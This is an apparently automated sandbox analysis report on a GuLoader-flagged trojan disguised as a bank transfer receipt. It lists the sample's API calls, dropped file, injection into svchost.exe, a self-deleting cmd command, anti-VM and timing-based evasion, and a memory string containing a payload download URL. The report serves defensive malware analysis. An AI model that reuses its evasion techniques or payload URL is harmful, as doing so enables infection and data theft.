Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09840 NtDelayExecution,LdrInitializeThunk, 15_2_1EB09840
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB099A0 NtCreateSection,LdrInitializeThunk, 15_2_1EB099A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09910 NtAdjustPrivilegesToken,LdrInitializeThunk, 15_2_1EB09910
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09540 NtReadFile,LdrInitializeThunk, 15_2_1EB09540
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09A80 NtOpenDirectoryObject, 15_2_1EB09A80
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB096D0 NtCreateKey, 15_2_1EB096D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09A10 NtQuerySection, 15_2_1EB09A10
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09610 NtEnumerateValueKey, 15_2_1EB09610
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09670 NtQueryInformationProcess, 15_2_1EB09670
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09650 NtQueryValueKey, 15_2_1EB09650
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB0A3B0 NtGetContextThread, 15_2_1EB0A3B0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09730 NtQueryVirtualMemory, 15_2_1EB09730
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB0A710 NtOpenProcessToken, 15_2_1EB0A710
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09B00 NtSetValueKey, 15_2_1EB09B00
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB0A770 NtOpenThread, 15_2_1EB0A770
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09770 NtSetInformationFile, 15_2_1EB09770
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09760 NtOpenProcess, 15_2_1EB09760
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB098A0 NtWriteVirtualMemory, 15_2_1EB098A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09820 NtEnumerateKey, 15_2_1EB09820
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB0B040 NtSuspendThread, 15_2_1EB0B040
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB095F0 NtQueryInformationFile, 15_2_1EB095F0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB099D0 NtCreateProcessEx, 15_2_1EB099D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB095D0 NtClose, 15_2_1EB095D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB0AD30 NtSetContextThread, 15_2_1EB0AD30
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09520 NtWaitForSingleObject, 15_2_1EB09520
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09560 NtWriteFile, 15_2_1EB09560
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB09950 NtQueueApcThread, 15_2_1EB09950
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_005279BE LdrInitializeThunk,NtProtectVirtualMemory, 15_2_005279BE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_00527AB1 Sleep,NtProtectVirtualMemory, 15_2_00527AB1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_005279B9 LdrInitializeThunk,NtProtectVirtualMemory, 15_2_005279B9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_00527AE7 NtProtectVirtualMemory, 15_2_00527AE7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69780 NtMapViewOfSection,LdrInitializeThunk, 22_2_03A69780
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69FE0 NtCreateMutant,LdrInitializeThunk, 22_2_03A69FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69710 NtQueryInformationToken,LdrInitializeThunk, 22_2_03A69710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A696E0 NtFreeVirtualMemory,LdrInitializeThunk, 22_2_03A696E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A696D0 NtCreateKey,LdrInitializeThunk, 22_2_03A696D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69660 NtAllocateVirtualMemory,LdrInitializeThunk, 22_2_03A69660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69650 NtQueryValueKey,LdrInitializeThunk, 22_2_03A69650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69A50 NtCreateFile,LdrInitializeThunk, 22_2_03A69A50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A699A0 NtCreateSection,LdrInitializeThunk, 22_2_03A699A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A695D0 NtClose,LdrInitializeThunk, 22_2_03A695D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69910 NtAdjustPrivilegesToken,LdrInitializeThunk, 22_2_03A69910
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69540 NtReadFile,LdrInitializeThunk, 22_2_03A69540
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69860 NtQuerySystemInformation,LdrInitializeThunk, 22_2_03A69860
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69840 NtDelayExecution,LdrInitializeThunk, 22_2_03A69840
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A697A0 NtUnmapViewOfSection, 22_2_03A697A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A6A3B0 NtGetContextThread, 22_2_03A6A3B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69730 NtQueryVirtualMemory, 22_2_03A69730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69B00 NtSetValueKey, 22_2_03A69B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A6A710 NtOpenProcessToken, 22_2_03A6A710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69760 NtOpenProcess, 22_2_03A69760
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69770 NtSetInformationFile, 22_2_03A69770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A6A770 NtOpenThread, 22_2_03A6A770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69A80 NtOpenDirectoryObject, 22_2_03A69A80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69A20 NtResumeThread, 22_2_03A69A20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69A00 NtProtectVirtualMemory, 22_2_03A69A00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69610 NtEnumerateValueKey, 22_2_03A69610
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69A10 NtQuerySection, 22_2_03A69A10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69670 NtQueryInformationProcess, 22_2_03A69670
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A695F0 NtQueryInformationFile, 22_2_03A695F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A699D0 NtCreateProcessEx, 22_2_03A699D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69520 NtWaitForSingleObject, 22_2_03A69520
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A6AD30 NtSetContextThread, 22_2_03A6AD30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69560 NtWriteFile, 22_2_03A69560
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69950 NtQueueApcThread, 22_2_03A69950
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A698A0 NtWriteVirtualMemory, 22_2_03A698A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A698F0 NtReadVirtualMemory, 22_2_03A698F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A69820 NtEnumerateKey, 22_2_03A69820
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A6B040 NtSuspendThread, 22_2_03A6B040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D38680 NtReadFile, 22_2_02D38680
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D387B0 NtAllocateVirtualMemory, 22_2_02D387B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D38700 NtClose, 22_2_02D38700
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D385D0 NtCreateFile, 22_2_02D385D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D3867C NtCreateFile,NtReadFile, 22_2_02D3867C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D38622 NtCreateFile, 22_2_02D38622
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D387AA NtAllocateVirtualMemory, 22_2_02D387AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D385CD NtCreateFile, 22_2_02D385CD
PE file contains executable resources (Code or Archives)
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, 61538 bytes, 1 file
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Binary or memory string: OriginalFilename vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, 00000000.00000003.294702939.000000000343E000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenongrav.exe vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, 00000000.00000000.293866460.0000000000F3A000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe, 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
PE file contains strange resources
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: nongrav.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Metadefender: Detection: 14%
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe ReversingLabs: Detection: 26%
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe "C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe"
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F31DC7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx, 0_2_00F31DC7
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/1@2/2
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F35849 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA, 0_2_00F35849
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F33E45 CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA, 0_2_00F33E45
Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_01
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F34E80 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA, 0_2_00F34E80
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Command line argument: Kernel32.dll 0_2_00F32A7E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wextract.pdb source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Binary string: wntdll.pdbUGP source: nongrav.exe, 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp, nongrav.exe, 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, svchost.exe, 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.788029496.0000000003800000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.786512054.0000000003600000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: nongrav.exe, nongrav.exe, 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp, nongrav.exe, 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.788029496.0000000003800000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.786512054.0000000003600000.00000004.00000001.sdmp
Source: Binary string: wextract.pdbPp source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source: Binary string: svchost.pdb source: nongrav.exe, 0000000F.00000002.786712436.0000000000110000.00000040.00020000.sdmp, nongrav.exe, 0000000F.00000003.785460105.0000000000756000.00000004.00000001.sdmp
Source: Binary string: svchost.pdbUGP source: nongrav.exe, 0000000F.00000002.786712436.0000000000110000.00000040.00020000.sdmp, nongrav.exe, 0000000F.00000003.785460105.0000000000756000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Unpacked PE file: 15.2.nongrav.exe.400000.1.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;
Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.507414765.000000000067A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F378A1 push ecx; ret 0_2_00F378B4
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_00405A42 pushad ; iretd 1_2_00405A43
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_00407418 push esp; ret 1_2_00407419
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA00C5 push 0000001Ch; ret 1_2_02AA00C7
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA306C pushfd ; ret 1_2_02AA3073
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA0043 push 0000001Ch; ret 1_2_02AA0045
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA23A8 pushfd ; iretd 1_2_02AA23B8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA3993 push ebp; retf 1_2_02AA3A08
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA3397 push eax; retf FA42h 1_2_02AA3493
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 1_2_02AA1339 push cs; retf 1_2_02AA133A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB1D0D1 push ecx; ret 15_2_1EB1D0E4
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_00527C89 push es; ret 15_2_00527C8B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_1_00405A42 pushad ; iretd 15_1_00405A43
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_1_00407418 push esp; ret 15_1_00407419
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_1_004015E0 push 0051A000h; ret 15_1_004015E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_03A7D0D1 push ecx; ret 22_2_03A7D0E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D3B87C push eax; ret 22_2_02D3B882
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D3B812 push eax; ret 22_2_02D3B818
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D3B81B push eax; ret 22_2_02D3B882
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D3514C push eax; iretd 22_2_02D35156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D34E06 push EEE5C1DBh; ret 22_2_02D34E0B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D3B7C5 push eax; ret 22_2_02D3B818
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D35F04 push ecx; ret 22_2_02D35F0F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D2CCA8 push edi; ret 22_2_02D2CCF9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 22_2_02D34405 pushfd ; retf 22_2_02D34406
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F32DAE GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA, 0_2_00F32DAE
Source: initial sample Static PE information: section name: .text entropy: 7.15232961918

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Jump to dropped file
Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe Code function: 0_2_00F31910 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA, 0_2_00F31910
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: nongrav.exe, 00000001.00000002.507816361.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=
Source: nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1PQ36FQ9YGHZAM_FHR1D0IRFRVEBW3FSZ
Source: nongrav.exe, 00000001.00000002.507816361.0000000002AF0000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: nongrav.exe, 00000001.00000002.507462728.00000000006DC000.00000004.00000020.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEOWS
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000002D28604 second address: 0000000002D2860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000002D2898E second address: 0000000002D28994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe TID: 6996 Thread sleep count: 581 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
